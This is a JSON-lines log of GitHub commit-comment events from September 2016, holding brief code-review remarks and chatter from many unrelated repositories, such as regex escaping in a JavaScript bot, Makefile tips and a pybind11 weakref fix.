{"id":"4512736203","type":"CommitCommentEvent","actor":{"login":"ben-eb"},"repo":{"name":"wooorm/remark"},"payload":{"comment":{"id":18891135,"position":null,"line":null,"path":null,"commit_id":"13719ded94a5c6f473c92d3305f57d24ab87fb93","created_at":"2016-09-03T20:52:56Z","updated_at":"2016-09-03T20:52:56Z","body":"Thanks! 👍 "}},"created_at":"2016-09-03T20:52:56Z"}
{"id":"4512736265","type":"CommitCommentEvent","actor":{"login":"simo999"},"repo":{"name":"simo999/simone"},"payload":{"comment":{"id":18891136,"position":null,"line":null,"path":null,"commit_id":"97cde1b3281a9893e76ca5beaad84a99f2ffa6ac","created_at":"2016-09-03T20:52:59Z","updated_at":"2016-09-03T20:52:59Z","body":"hola"}},"created_at":"2016-09-03T20:52:59Z"}
{"id":"4512737131","type":"CommitCommentEvent","actor":{"login":"simo999"},"repo":{"name":"simo999/simone"},"payload":{"comment":{"id":18891137,"position":null,"line":null,"path":null,"commit_id":"97cde1b3281a9893e76ca5beaad84a99f2ffa6ac","created_at":"2016-09-03T20:53:38Z","updated_at":"2016-09-03T20:53:38Z","body":"c"}},"created_at":"2016-09-03T20:53:38Z"}
{"id":"4512738798","type":"CommitCommentEvent","actor":{"login":"rschaerer"},"repo":{"name":"sinndrin/sinndrin.github.io"},"payload":{"comment":{"id":18891138,"position":5,"line":0,"path":"angebote/_posts/2014-02-01-Fairphone-Reparatur.markdown","commit_id":"07393b310f2a0508e3410fca07e365d5043a5afe","created_at":"2016-09-03T20:54:48Z","updated_at":"2016-09-03T20:54:48Z","body":"@TraGe: Wieso machst du ein zweites reparaturformular und ersetzt nicht das bestehende?"}},"created_at":"2016-09-03T20:54:48Z"}
{"id":"4512738937","type":"CommitCommentEvent","actor":{"login":"simo999"},"repo":{"name":"simo999/simone"},"payload":{"comment":{"id":18891139,"position":null,"line":null,"path":null,"commit_id":"97cde1b3281a9893e76ca5beaad84a99f2ffa6ac","created_at":"2016-09-03T20:54:54Z","updated_at":"2016-09-03T20:54:54Z","body":"c iao\r\n"}},"created_at":"2016-09-03T20:54:54Z"}
{"id":"4512739623","type":"CommitCommentEvent","actor":{"login":"Dramacydal"},"repo":{"name":"cmangos/mangos-wotlk"},"payload":{"comment":{"id":18891140,"position":null,"line":null,"path":null,"commit_id":"2acf6898cf75672a8e9451393ab7bd07bff17a86","created_at":"2016-09-03T20:55:20Z","updated_at":"2016-09-03T20:55:20Z","body":"Oh my God psz... skolko let slolko zim :D"}},"created_at":"2016-09-03T20:55:20Z"}
{"id":"4512739766","type":"CommitCommentEvent","actor":{"login":"sethten"},"repo":{"name":"sethten/ficbot"},"payload":{"comment":{"id":18891141,"position":106,"line":67,"path":"ficbot.js","commit_id":"ef27ac273711676aaa9d628131245821defa3a19","created_at":"2016-09-03T20:55:29Z","updated_at":"2016-09-03T20:55:29Z","body":"Separated these out because replacing with `$&` would not yield the matched string, see line note at 99"}},"created_at":"2016-09-03T20:55:29Z"}
{"id":"4512742827","type":"CommitCommentEvent","actor":{"login":"sethten"},"repo":{"name":"sethten/ficbot"},"payload":{"comment":{"id":18891145,"position":138,"line":99,"path":"ficbot.js","commit_id":"ef27ac273711676aaa9d628131245821defa3a19","created_at":"2016-09-03T20:57:44Z","updated_at":"2016-09-03T20:57:44Z","body":"See 114 [explain why this really wouldn't work and is commented]"}},"created_at":"2016-09-03T20:57:44Z"}
{"id":"4512743184","type":"CommitCommentEvent","actor":{"login":"sethten"},"repo":{"name":"sethten/ficbot"},"payload":{"comment":{"id":18891146,"position":155,"line":114,"path":"ficbot.js","commit_id":"ef27ac273711676aaa9d628131245821defa3a19","created_at":"2016-09-03T20:57:58Z","updated_at":"2016-09-03T20:57:58Z","body":"explanation"}},"created_at":"2016-09-03T20:57:58Z"}
{"id":"4512747104","type":"CommitCommentEvent","actor":{"login":"sethten"},"repo":{"name":"sethten/ficbot"},"payload":{"comment":{"id":18891148,"position":19,"line":13,"path":"ficbot.js","commit_id":"ef27ac273711676aaa9d628131245821defa3a19","created_at":"2016-09-03T21:00:50Z","updated_at":"2016-09-03T21:00:50Z","body":"Even in a raw string `\\u` will be interpreted as a character escape sequence. LaTeX will still process the command with the added space here, but it is not ideal. See [this](http://stackoverflow.com/questions/39310685/u-in-javascript-string-rawtemplate-literal) Stack Overflow question for more possible workarounds, such as `\\x5C`->`\\`."}},"created_at":"2016-09-03T21:00:50Z"}
{"id":"4512748434","type":"CommitCommentEvent","actor":{"login":"sethten"},"repo":{"name":"sethten/ficbot"},"payload":{"comment":{"id":18891149,"position":27,"line":17,"path":"ficbot.js","commit_id":"ef27ac273711676aaa9d628131245821defa3a19","created_at":"2016-09-03T21:01:56Z","updated_at":"2016-09-03T21:01:56Z","body":"Not strictly needed here because this is a literal and we know there won't be text after this line to interfere, but this is [best practice](https://github.com/sethten/ficbot/commit/2ae7e088144e3e19c89afbe059130ec7a4fde851#diff-d67eb3cfed112a97d623777ff48a9723R58)."}},"created_at":"2016-09-03T21:01:56Z"}
{"id":"4512750354","type":"CommitCommentEvent","actor":{"login":"Platinteufel"},"repo":{"name":"drtshock/Essentials"},"payload":{"comment":{"id":18891153,"position":null,"line":null,"path":null,"commit_id":"c4c303dbfbd2accd5946ea4849318a574f027912","created_at":"2016-09-03T21:03:31Z","updated_at":"2016-09-03T21:03:31Z","body":"What about /tell? It's still shown twice. "}},"created_at":"2016-09-03T21:03:31Z"}
{"id":"4512750843","type":"CommitCommentEvent","actor":{"login":"bulentv"},"repo":{"name":"bulentv/js_zklib"},"payload":{"comment":{"id":18891154,"position":null,"line":null,"path":null,"commit_id":"96dde430f4e8afb8c6d960c1e9ef63a0272d1323","created_at":"2016-09-03T21:03:57Z","updated_at":"2016-09-03T21:03:57Z","body":"[Thanks](https://github.com/bulentv/js_zklib/commit/b58b065981e48319bd814265176b9d4eb234830a)"}},"created_at":"2016-09-03T21:03:57Z"}
{"id":"4512752047","type":"CommitCommentEvent","actor":{"login":"akankshakap20"},"repo":{"name":"akankshakap20/Projectassignment2"},"payload":{"comment":{"id":18891158,"position":null,"line":null,"path":null,"commit_id":"ef5fef38e5f388111e087b48bbbd30043072b8ec","created_at":"2016-09-03T21:05:00Z","updated_at":"2016-09-03T21:05:00Z","body":"cache inverse \r\n"}},"created_at":"2016-09-03T21:05:00Z"}
{"id":"4512753366","type":"CommitCommentEvent","actor":{"login":"webknjaz"},"repo":{"name":"GDG-Ukraine/gdg.org.ua"},"payload":{"comment":{"id":18891159,"position":6,"line":61,"path":".gitignore","commit_id":"286d53ef14de5fdabaf20d7082bc258ffdde7cc1","created_at":"2016-09-03T21:06:04Z","updated_at":"2016-09-03T21:06:04Z","body":"I'd leave `.env` convention and ignore it"}},"created_at":"2016-09-03T21:06:04Z"}
{"id":"4512754134","type":"CommitCommentEvent","actor":{"login":"webknjaz"},"repo":{"name":"GDG-Ukraine/gdg.org.ua"},"payload":{"comment":{"id":18891160,"position":13,"line":145,"path":"Makefile","commit_id":"286d53ef14de5fdabaf20d7082bc258ffdde7cc1","created_at":"2016-09-03T21:06:38Z","updated_at":"2016-09-03T21:06:38Z","body":"I think you don't need bash -c here"}},"created_at":"2016-09-03T21:06:38Z"}
{"id":"4512754135","type":"CommitCommentEvent","actor":{"login":"nhooyr"},"repo":{"name":"neovim/neovim"},"payload":{"comment":{"id":18891161,"position":5,"line":54,"path":"runtime/autoload/man.vim","commit_id":"c9e39f8227e320e156c92ee5192223304a9f1761","created_at":"2016-09-03T21:06:38Z","updated_at":"2016-09-03T21:06:38Z","body":"Oh I must have set `shortmess` to disable those because I see them now with `nvim -u NORC`. No, I agree, those should be silenced. Not sure where you were getting the `No lines in buffer` messages from though. Line 76 does not message \"No lines in buffer\" even with `nvim -u NORC`, so why was that silenced?"}},"created_at":"2016-09-03T21:06:38Z"}
{"id":"4512754397","type":"CommitCommentEvent","actor":{"login":"sethten"},"repo":{"name":"sethten/ficbot"},"payload":{"comment":{"id":18891162,"position":106,"line":67,"path":"ficbot.js","commit_id":"ef27ac273711676aaa9d628131245821defa3a19","created_at":"2016-09-03T21:06:52Z","updated_at":"2016-09-03T21:06:52Z","body":"Wait... it doesn't matter if it is `<em>` or `<i>` because they are both replaced with the same thing, `\\\\textit{`. Simplifying in the next commit!"}},"created_at":"2016-09-03T21:06:52Z"}
{"id":"4512755073","type":"CommitCommentEvent","actor":{"login":"webknjaz"},"repo":{"name":"GDG-Ukraine/gdg.org.ua"},"payload":{"comment":{"id":18891163,"position":42,"line":42,"path":"scripts/mk-environ-file.sh","commit_id":"286d53ef14de5fdabaf20d7082bc258ffdde7cc1","created_at":"2016-09-03T21:07:32Z","updated_at":"2016-09-03T21:07:32Z","body":"Not sure whether env file supports trailing comments"}},"created_at":"2016-09-03T21:07:32Z"}
{"id":"4512755545","type":"CommitCommentEvent","actor":{"login":"masonelmore"},"repo":{"name":"masonelmore/class_scheduler"},"payload":{"comment":{"id":18891164,"position":30,"line":58,"path":"main.py","commit_id":"8b3eb70d79dcb91d1647b6f1b5a779393f4b42b4","created_at":"2016-09-03T21:07:58Z","updated_at":"2016-09-03T21:07:58Z","body":"`get_user_int` has a default value of `None` for the `valid_range` parameter.  You don't have to pass in `None` as an argument if you don't need to check for a valid range."}},"created_at":"2016-09-03T21:07:58Z"}
{"id":"4512755717","type":"CommitCommentEvent","actor":{"login":"random-person-001"},"repo":{"name":"random-person-001/MagicText"},"payload":{"comment":{"id":18891165,"position":68,"line":246,"path":"SourceryTextb1/GameObjects/Player.java","commit_id":"4b47baf09ea0ca8b0262bf267fcdb92307dccaf8","created_at":"2016-09-03T21:08:09Z","updated_at":"2016-09-03T21:08:09Z","body":"'HurtColor' was an earlier attempt to do something like this.  I suggest that it (and its corresponding method in Player that sets the background color to some red) be removed with this new (probably better) way of doing it."}},"created_at":"2016-09-03T21:08:09Z"}
{"id":"4512756450","type":"CommitCommentEvent","actor":{"login":"c4f3r"},"repo":{"name":"c4f3r/hello-world"},"payload":{"comment":{"id":18891167,"position":null,"line":null,"path":null,"commit_id":"9ac96a36a53d03f13fbeba64db2f8f53e266318b","created_at":"2016-09-03T21:08:45Z","updated_at":"2016-09-03T21:08:45Z","body":"master @# ## "}},"created_at":"2016-09-03T21:08:45Z"}
{"id":"4512757290","type":"CommitCommentEvent","actor":{"login":"fuzegit"},"repo":{"name":"instantsoft/icms2"},"payload":{"comment":{"id":18891169,"position":null,"line":null,"path":null,"commit_id":"74bae5305c1c4554f1a469515fac956cd11a1ee3","created_at":"2016-09-03T21:09:30Z","updated_at":"2016-09-03T21:09:30Z","body":"https://github.com/instantsoft/icms2/commit/baf2e325d9f807b3ed44c2f1669d8ee1b0e29a07"}},"created_at":"2016-09-03T21:09:30Z"}
{"id":"4512762094","type":"CommitCommentEvent","actor":{"login":"kilodalton"},"repo":{"name":"ClinGen/clincoded"},"payload":{"comment":{"id":18891173,"position":14,"line":562,"path":"src/clincoded/static/components/variant_central/interpretation/computational.js","commit_id":"4522a18f16836a6fe262c21b0d2acc94d21490e1","created_at":"2016-09-03T21:13:35Z","updated_at":"2016-09-03T21:13:35Z","body":"A number of developers consider this a GitHub/Atom/(other editor) syntax highlighting bug and is not a problem with the code itself. The bug has even been fixed and regressed to being broken. I would not change to an entity code at this time since keeping it as a single quote increases readability and this is likely to be fixed in the future based on developer demand."}},"created_at":"2016-09-03T21:13:35Z"}
{"id":"4512762755","type":"CommitCommentEvent","actor":{"login":"eidheim"},"repo":{"name":"eidheim/jucipp"},"payload":{"comment":{"id":18891175,"position":51,"line":1335,"path":"src/source.cc","commit_id":"3242f719c017f95be2e6a4f3ade7d21b8ce445b9","created_at":"2016-09-03T21:14:12Z","updated_at":"2016-09-03T21:14:12Z","body":"@zalox I made control up/down work like control left/right, but vertically of course (like in emacs for instance). Not completely done yet, it should mirror the behaviour in emacs I'm thinking, just a small piece left. I'll probably commit this Tomorrow or Monday at some point unless you argue otherwise. I could also optimize it a bit more, but it's very fast now, and more optimization would make readability suffer. "}},"created_at":"2016-09-03T21:14:12Z"}
{"id":"4512766158","type":"CommitCommentEvent","actor":{"login":"auntieNeo"},"repo":{"name":"auntieNeo/libmc"},"payload":{"comment":{"id":18891182,"position":null,"line":null,"path":null,"commit_id":"ee18d5b9f2c9912090a9f3b2a4c5b1f8dc48cf13","created_at":"2016-09-03T21:17:20Z","updated_at":"2016-09-03T21:17:20Z","body":"No. This algorithm (colored marching squares) is closer to ordinary, 2D marching squares. The difference is instead of having a scalar field with values either above or below the isosurface, I have colored values.\r\n\r\nThe intent is to use this algorithm for computing generalized Voronoi diagrams; it's probably not useful for very much else. I might not use it anyway since it's really just an experiment."}},"created_at":"2016-09-03T21:17:20Z"}
{"id":"4512767380","type":"CommitCommentEvent","actor":{"login":"FaizaElSharif"},"repo":{"name":"FaizaElSharif/Project"},"payload":{"comment":{"id":18891184,"position":null,"line":null,"path":null,"commit_id":"aeace77655bcf7d022a6f239c90eaffa3045ee0f","created_at":"2016-09-03T21:18:24Z","updated_at":"2016-09-03T21:18:24Z","body":"my project"}},"created_at":"2016-09-03T21:18:24Z"}
{"id":"4512771618","type":"CommitCommentEvent","actor":{"login":"AlexandreMasta"},"repo":{"name":"ElbertoOne/Stockfish"},"payload":{"comment":{"id":18891189,"position":null,"line":null,"path":null,"commit_id":"6208ac17a06305bc0049ce0bef578dfa5b1bdec3","created_at":"2016-09-03T21:22:12Z","updated_at":"2016-09-03T21:22:12Z","body":"Seems that SPSA can do wonders with  LOTS AND LOTS of variables...amazing..."}},"created_at":"2016-09-03T21:22:12Z"}
{"id":"4512771818","type":"CommitCommentEvent","actor":{"login":"mhsjlw"},"repo":{"name":"minecrafter/voxelwind"},"payload":{"comment":{"id":18891191,"position":null,"line":null,"path":null,"commit_id":"b97f4c3133d4df4a78e276d2ca3fcddc808de260","created_at":"2016-09-03T21:22:23Z","updated_at":"2016-09-03T21:22:23Z","body":"Yes"}},"created_at":"2016-09-03T21:22:23Z"}
{"id":"4512772386","type":"CommitCommentEvent","actor":{"login":"marb99"},"repo":{"name":"SubtitleEdit/subtitleedit"},"payload":{"comment":{"id":18891192,"position":null,"line":null,"path":null,"commit_id":"f6e917367921d0f459c7b021996d77979e83a8b6","created_at":"2016-09-03T21:22:56Z","updated_at":"2016-09-03T21:22:56Z","body":"@ivandrofly \r\n\r\nhere is it \r\n[Subs.zip](https://github.com/SubtitleEdit/subtitleedit/files/453641/Subs.zip)\r\n\r\n"}},"created_at":"2016-09-03T21:22:56Z"}
{"id":"4512778028","type":"CommitCommentEvent","actor":{"login":"SpadesNeil"},"repo":{"name":"PolarisSS13/Polaris"},"payload":{"comment":{"id":18891196,"position":4,"line":14,"path":"code/game/objects/random/random.dm","commit_id":"f75d509e7fe8e364d5db5782a3dd1ced183a1dfd","created_at":"2016-09-03T21:27:58Z","updated_at":"2016-09-03T21:27:58Z","body":"Then it doesn't work when spawned inside of lockers or after round start."}},"created_at":"2016-09-03T21:27:58Z"}
{"id":"4512779044","type":"CommitCommentEvent","actor":{"login":"samstl77"},"repo":{"name":"samstl77/FSJS-Weekly-Challenges"},"payload":{"comment":{"id":18891197,"position":null,"line":null,"path":null,"commit_id":"26fdb57b6f63a251ab939d0b523fba029b23f11e","created_at":"2016-09-03T21:28:52Z","updated_at":"2016-09-03T21:28:52Z","body":"Done. Thank you."}},"created_at":"2016-09-03T21:28:52Z"}
{"id":"4512784738","type":"CommitCommentEvent","actor":{"login":"playgrounder"},"repo":{"name":"playgrounder/hello_world"},"payload":{"comment":{"id":18891202,"position":4,"line":4,"path":"README.md","commit_id":"c5d23d44cd39173199d0a6c6ffd18cedbcbcffe7","created_at":"2016-09-03T21:32:17Z","updated_at":"2016-09-03T21:32:17Z","body":"wtf"}},"created_at":"2016-09-03T21:32:17Z"}
{"id":"4512786702","type":"CommitCommentEvent","actor":{"login":"jagerman"},"repo":{"name":"aldanor/pybind11"},"payload":{"comment":{"id":18891203,"position":12,"line":741,"path":"include/pybind11/pybind11.h","commit_id":"8d10aa836cc6ea8d30b4228c7718d835401a4947","created_at":"2016-09-03T21:33:19Z","updated_at":"2016-09-03T21:33:19Z","body":"I think this `if` block needs to be amended slightly: the `if (self->weakrefs) ...` part should run even if the type is untracked.  (Otherwise I think keep_alives on untracked types will break)."}},"created_at":"2016-09-03T21:33:19Z"}
{"id":"4512791880","type":"CommitCommentEvent","actor":{"login":"kuzyn"},"repo":{"name":"n10as/n20.as"},"payload":{"comment":{"id":18891209,"position":null,"line":null,"path":null,"commit_id":"078387f5f675a9b2f260b0015d2adf0061715361","created_at":"2016-09-03T21:36:14Z","updated_at":"2016-09-03T21:36:14Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;zjZgTGZo&#x2F;2-ch-001-configure-local-envs-project-files\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> [CH-001] Configure local envs &#x2F; project files</a>"}},"created_at":"2016-09-03T21:36:14Z"}
{"id":"4512792996","type":"CommitCommentEvent","actor":{"login":"jlalanya"},"repo":{"name":"jlalanya/es6-starter-kit"},"payload":{"comment":{"id":18891211,"position":null,"line":null,"path":null,"commit_id":"6260b92380b5eefc8d9f4b50323061d744587c7b","created_at":"2016-09-03T21:37:05Z","updated_at":"2016-09-03T21:37:05Z","body":"This is the change"}},"created_at":"2016-09-03T21:37:05Z"}
{"id":"4512793800","type":"CommitCommentEvent","actor":{"login":"cernerae"},"repo":{"name":"cernerae/test_repo"},"payload":{"comment":{"id":18891214,"position":null,"line":null,"path":null,"commit_id":"ae4fa29ad53559f80665a2d3c82bc4bc9f617f29","created_at":"2016-09-03T21:37:39Z","updated_at":"2016-09-03T21:37:39Z","body":"lol"}},"created_at":"2016-09-03T21:37:39Z"}
{"id":"4512795294","type":"CommitCommentEvent","actor":{"login":"kuzyn"},"repo":{"name":"n10as/n20.as"},"payload":{"comment":{"id":18891216,"position":1,"line":1,"path":".eslintrc.js","commit_id":"078387f5f675a9b2f260b0015d2adf0061715361","created_at":"2016-09-03T21:38:51Z","updated_at":"2016-09-03T21:38:51Z","body":"@aconanlai  can you check that the .eslintrc.js is valid/you can lint in your editor directory? nvim giving me a big weep when i try to lint, but it should work"}},"created_at":"2016-09-03T21:38:51Z"}
{"id":"4512795884","type":"CommitCommentEvent","actor":{"login":"dshoreman"},"repo":{"name":"rainlab/location-plugin"},"payload":{"comment":{"id":18891218,"position":null,"line":null,"path":null,"commit_id":"b3ba2d5f90efb1247c5be68fdcf9fe3e79a28751","created_at":"2016-09-03T21:39:18Z","updated_at":"2016-09-03T21:39:18Z","body":"@acasar Good spot - that's exactly why I had the `is_pinned` column seeded separately. Didn't even notice the field got added back in this \"tidy up\"... It'll break it for everyone, updating or installing."}},"created_at":"2016-09-03T21:39:18Z"}
{"id":"4512796447","type":"CommitCommentEvent","actor":{"login":"moteus"},"repo":{"name":"fusionpbx/fusionpbx"},"payload":{"comment":{"id":18891219,"position":26,"line":40,"path":"resources/install/scripts/app/voicemail/resources/functions/forward_add_intro.lua","commit_id":"002f2b67d4ad689dfb54f1cc09262fa38a599484","created_at":"2016-09-03T21:39:45Z","updated_at":"2016-09-03T21:39:45Z","body":"This should be aftere when `Database` loaded."}},"created_at":"2016-09-03T21:39:45Z"}
{"id":"4512798842","type":"CommitCommentEvent","actor":{"login":"KristineWolf"},"repo":{"name":"KristineWolf/Eventastic"},"payload":{"comment":{"id":18891221,"position":null,"line":null,"path":null,"commit_id":"92606c95ec003607d43bb68325a009a8f75352db","created_at":"2016-09-03T21:41:39Z","updated_at":"2016-09-03T21:41:39Z","body":"ach und wenn wir es so machen achten wir auch wiederum auf die radio state machine da nur ganz zu beginn Daten aus der DB geholt werden und für die anderen Activities in einem Puffer gelagert werden\r\n\r\nund ich versuch bei AllPossibleCities wieder ein SearchView einzubinden \r\nmal schaun obs diesmal klappt"}},"created_at":"2016-09-03T21:41:39Z"}
{"id":"4512798965","type":"CommitCommentEvent","actor":{"login":"mazharfarhan"},"repo":{"name":"mazharfarhan/HackerRank"},"payload":{"comment":{"id":18891222,"position":null,"line":null,"path":null,"commit_id":"f73ff2f0b6efebe83e2ac64a42320ac7701de70c","created_at":"2016-09-03T21:41:44Z","updated_at":"2016-09-03T21:41:44Z","body":"Program to check if a string is balanced or not"}},"created_at":"2016-09-03T21:41:44Z"}
{"id":"4512799048","type":"CommitCommentEvent","actor":{"login":"201560543"},"repo":{"name":"akankshakap20/Projectassignment2"},"payload":{"comment":{"id":18891223,"position":null,"line":null,"path":null,"commit_id":"ef5fef38e5f388111e087b48bbbd30043072b8ec","created_at":"2016-09-03T21:41:48Z","updated_at":"2016-09-03T21:41:48Z","body":"Hey!\r\nyou were supposed to make changes in cachematrix.R file.\r\nPlease push it otherwise you will not get grades."}},"created_at":"2016-09-03T21:41:48Z"}
{"id":"4512799637","type":"CommitCommentEvent","actor":{"login":"xfurry"},"repo":{"name":"cmangos/mangos-wotlk"},"payload":{"comment":{"id":18891224,"position":null,"line":null,"path":null,"commit_id":"2acf6898cf75672a8e9451393ab7bd07bff17a86","created_at":"2016-09-03T21:42:09Z","updated_at":"2016-09-03T21:42:09Z","body":":question: "}},"created_at":"2016-09-03T21:42:09Z"}
{"id":"4512801875","type":"CommitCommentEvent","actor":{"login":"jruesga"},"repo":{"name":"jruesga/rview"},"payload":{"comment":{"id":18891226,"position":28,"line":70,"path":"app/src/main/java/com/ruesga/rview/widget/DividerItemDecoration.java","commit_id":"5f8031e2e905d33d49667f7854a416824a1139d4","created_at":"2016-09-03T21:44:07Z","updated_at":"2016-09-03T21:44:07Z","body":"yes, exactly. My original commit didn't check RTL at all."}},"created_at":"2016-09-03T21:44:07Z"}
{"id":"4512802758","type":"CommitCommentEvent","actor":{"login":"d-led"},"repo":{"name":"d-led/persistent_observable_experiment"},"payload":{"comment":{"id":18891228,"position":null,"line":null,"path":null,"commit_id":"4efd5a6c0ba25585e3ff952a9a3d52959d105a99","created_at":"2016-09-03T21:44:51Z","updated_at":"2016-09-03T21:44:51Z","body":"@paul-michalik check this out. Potential other ways: add `Peek` (`HasNext`) to the queue or work with default values."}},"created_at":"2016-09-03T21:44:51Z"}
{"id":"4512804255","type":"CommitCommentEvent","actor":{"login":"ebaydayz"},"repo":{"name":"EpochModTeam/DayZ-Epoch"},"payload":{"comment":{"id":18891229,"position":null,"line":null,"path":null,"commit_id":"d1d5fe54f3e0c9152ff77fb8f7ddbc5293f63519","created_at":"2016-09-03T21:46:04Z","updated_at":"2016-09-03T21:46:04Z","body":"It is still possible to enter cheats in the lobby because DZE_FilterCheats isNil at that point."}},"created_at":"2016-09-03T21:46:04Z"}
{"id":"4512805046","type":"CommitCommentEvent","actor":{"login":"hardknoxni69a"},"repo":{"name":"NoxxDev/NecroBot"},"payload":{"comment":{"id":18891230,"position":null,"line":null,"path":null,"commit_id":"28454f953679dde6a0e9b9f1e48d15a17ff18eea","created_at":"2016-09-03T21:46:42Z","updated_at":"2016-09-03T21:46:42Z","body":"Im almost positive you can not choose a 64character nickname i believe it is around 15-16 characters sorry if i am wrong just trying to help.avoid issues"}},"created_at":"2016-09-03T21:46:42Z"}
{"id":"4512806559","type":"CommitCommentEvent","actor":{"login":"invy"},"repo":{"name":"elfmz/far2l"},"payload":{"comment":{"id":18891231,"position":5,"line":4,"path":"far2l/setattr.cpp","commit_id":"767352303b84f94a8db2d3242bf1625c6be99927","created_at":"2016-09-03T21:47:59Z","updated_at":"2016-09-03T21:47:59Z","body":"I think it would make sense to translate comments into English, so more people would be able to participate in the project."}},"created_at":"2016-09-03T21:47:59Z"}
{"id":"4512807367","type":"CommitCommentEvent","actor":{"login":"REHAMMSALLA"},"repo":{"name":"REHAMMSALLA/Master"},"payload":{"comment":{"id":18891233,"position":4,"line":2,"path":"README.md","commit_id":"40eaea0d572f77757f11d3034230434efcbdbec5","created_at":"2016-09-03T21:48:45Z","updated_at":"2016-09-03T21:48:45Z","body":"reference: \r\nhttp://www.srikanthtechnologies.com/blog/java/rest_service_client.aspx"}},"created_at":"2016-09-03T21:48:45Z"}
{"id":"4512809642","type":"CommitCommentEvent","actor":{"login":"sethten"},"repo":{"name":"sethten/ficbot"},"payload":{"comment":{"id":18891235,"position":5,"line":13,"path":"ficbot.js","commit_id":"3701dad534e2e7c917442eb6c7aaec47441fb645","created_at":"2016-09-03T21:50:46Z","updated_at":"2016-09-03T21:50:46Z","body":"`\\x5C` -> `\\`, see [last commit](https://github.com/sethten/ficbot/commit/ef27ac273711676aaa9d628131245821defa3a19#diff-d67eb3cfed112a97d623777ff48a9723R13)."}},"created_at":"2016-09-03T21:50:46Z"}
{"id":"4512810204","type":"CommitCommentEvent","actor":{"login":"sethten"},"repo":{"name":"sethten/ficbot"},"payload":{"comment":{"id":18891236,"position":38,"line":87,"path":"ficbot.js","commit_id":"3701dad534e2e7c917442eb6c7aaec47441fb645","created_at":"2016-09-03T21:51:16Z","updated_at":"2016-09-03T21:51:16Z","body":"Can't be included on the loop on line 102 because $ is a special character regex and needs to be escaped."}},"created_at":"2016-09-03T21:51:16Z"}
{"id":"4512810262","type":"CommitCommentEvent","actor":{"login":"springmeyer"},"repo":{"name":"mapnik/node-mapnik"},"payload":{"comment":{"id":18891237,"position":12,"line":12,"path":"scripts/is_pr_merge.sh","commit_id":"240bedcbeeb8d8583706bbca61b87c27b1a29758","created_at":"2016-09-03T21:51:20Z","updated_at":"2016-09-03T21:51:20Z","body":"@lightmare thanks for that note. I don't know. It took some time to get this right with the git commands. Hopefully that would work, but would require more testing - added a TODO to do that in 0cf552c"}},"created_at":"2016-09-03T21:51:20Z"}
{"id":"4512810643","type":"CommitCommentEvent","actor":{"login":"sethten"},"repo":{"name":"sethten/ficbot"},"payload":{"comment":{"id":18891238,"position":47,"line":102,"path":"ficbot.js","commit_id":"3701dad534e2e7c917442eb6c7aaec47441fb645","created_at":"2016-09-03T21:51:41Z","updated_at":"2016-09-03T21:51:41Z","body":"Apparently the `var` keyword here avoids creating a global"}},"created_at":"2016-09-03T21:51:41Z"}
{"id":"4512811528","type":"CommitCommentEvent","actor":{"login":"sethten"},"repo":{"name":"sethten/ficbot"},"payload":{"comment":{"id":18891240,"position":54,"line":107,"path":"ficbot.js","commit_id":"3701dad534e2e7c917442eb6c7aaec47441fb645","created_at":"2016-09-03T21:52:28Z","updated_at":"2016-09-03T21:52:28Z","body":"not sure if this is actually easier to read but hey it's here, take a look\r\n\r\n    var replRegex = new RegExp(\r\n      Object.keys(replacements)\r\n            .map(function(e){\r\n              return replacements[e].match; })\r\n            .join(\"|\"),\r\n      \"g\"\r\n    );"}},"created_at":"2016-09-03T21:52:28Z"}
{"id":"4512812412","type":"CommitCommentEvent","actor":{"login":"kuzyn"},"repo":{"name":"n10as/n20.as"},"payload":{"comment":{"id":18891241,"position":null,"line":null,"path":null,"commit_id":"d1e9dbc4e0bc97c387eaa189e7d25e2d3a9a8fcb","created_at":"2016-09-03T21:53:14Z","updated_at":"2016-09-03T21:53:14Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;CE95vnVE&#x2F;5-ch-004-configure-repository\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> [CH-004] Configure repository</a>"}},"created_at":"2016-09-03T21:53:14Z"}
{"id":"4512813828","type":"CommitCommentEvent","actor":{"login":"KamranMackey"},"repo":{"name":"NielsLeenheer/html5test"},"payload":{"comment":{"id":18891242,"position":null,"line":null,"path":null,"commit_id":"10ffb691f026303255ae1b4fab6b5090446478b1","created_at":"2016-09-03T21:54:35Z","updated_at":"2016-09-03T21:54:35Z","body":"what the heck is this formatting? xD"}},"created_at":"2016-09-03T21:54:35Z"}
{"id":"4512815220","type":"CommitCommentEvent","actor":{"login":"bigretromike"},"repo":{"name":"japanesemediamanager/jmmserver"},"payload":{"comment":{"id":18891245,"position":null,"line":null,"path":null,"commit_id":"56d23759ae33150cd564a6a27fc4e30dae38f29c","created_at":"2016-09-03T21:55:56Z","updated_at":"2016-09-03T21:55:56Z","body":"patching fast :p to bad that I miss it and install .3 ;-)\r\ncritical thing ?"}},"created_at":"2016-09-03T21:55:56Z"}
{"id":"4512817014","type":"CommitCommentEvent","actor":{"login":"jserodio"},"repo":{"name":"uEssentials/uEssentials"},"payload":{"comment":{"id":18891247,"position":null,"line":null,"path":null,"commit_id":"c197cb9a9965ccc7d7de6cd97dd80c95bee92616","created_at":"2016-09-03T21:57:32Z","updated_at":"2016-09-03T21:57:32Z","body":"This commit is from yesterday, but last release is from 2 days ago, would you mind compiling it on a new release? I really could use the asterisk (*) wildcard for /requesturl. **Great job** by the way."}},"created_at":"2016-09-03T21:57:32Z"}
{"id":"4512819575","type":"CommitCommentEvent","actor":{"login":"rschaerer"},"repo":{"name":"sinndrin/sinndrin.github.io"},"payload":{"comment":{"id":18891253,"position":6,"line":16,"path":"blog/_posts/2016-07-18-fairphone-2-ersatzteile.markdown","commit_id":"e89ec7e5f4ac7772c945c83390783066953a9139","created_at":"2016-09-03T21:59:53Z","updated_at":"2016-09-03T21:59:53Z","body":"@TraGe: Bitte verlinke nie das Wort `hier`, weil z.B. [hier](https://www.startpage.com/do/search?q=dont+link+the+word+here&l=deutsch), [da](https://www.w3.org/QA/Tips/noClickHere) und [dort](http://uxmovement.com/content/why-your-links-should-never-say-click-here/) sowie [hier drüben](https://www.smashingmagazine.com/2012/06/links-should-never-say-click-here/). :boom: \r\n\r\nAnsonsten :heart: für diesen commit! :tada:  "}},"created_at":"2016-09-03T21:59:53Z"}
